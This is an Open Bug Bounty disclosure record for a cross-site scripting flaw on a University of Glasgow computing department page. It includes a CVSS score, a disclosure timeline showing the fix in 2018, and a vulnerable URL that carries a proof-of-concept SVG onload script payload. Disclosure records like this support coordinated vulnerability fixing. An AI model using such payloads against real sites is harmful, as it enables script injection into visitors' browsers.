dcs.gla.ac.uk XSS vulnerability

2017-12-31T12:24:00
ID OBB:472255
Type openbugbounty
Reporter keritzy
Modified 2018-04-02T00:28:00

Description

Open Bug Bounty ID: OBB-472255

Description| Value
---|---
Affected Website:| dcs.gla.ac.uk
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.dcs.gla.ac.uk/publications/paperdetails.cfm?id=9192%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&author_list=Joho%2CH.%3BHopfgartner%2CF.%3BJose%2CJ.M.%3Bvan%20Rijsbergen%2CC.J.&abstract=This%20report%20describes%20AIR%202008%2C%20the%20second%20international%20workshop%20on%20Adaptive%20Information%20Retrieval%20%28AIR%29%2C%20held%20in%20October%202008%20at%20London%2C%20UK.%20The%20workshop%20attracted%20over%2030%20participants%20across%20the%20world%20and%20the%20largest%20workshop%20held%20in%20conjunction%20with%20IIiX%202008.%20The%20presentation%20ranged%20widely%20from%20theories%20to%20practices%20on%20Adaptive%20Information%20Retrieval.%20The%20workshop%20consisted%20of%20two%20keynote%20presentations%2C%20three%20oral%20presentations%2C%20breakout%20sessions%2C%20and%20poster%20session.&keywords=&title=AIR%202008%3A%20Second%20International%20Workshop%20on%20Adaptive%20Information%20Retrieval&year=2009-01-01%2000:00:00.0

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 31 December, 2017 12:24 GMT
Vulnerability Verified:| 1 January, 2018 08:59 GMT
Website Operator Notified:| 1 January, 2018 08:59 GMT
Vulnerability Published:| 1 January, 2018 08:59 GMT [without any technical details]
Vulnerability Fixed:| 2 April, 2018 00:28 GMT
Public Disclosure:| 2 April, 2018 00:28 GMT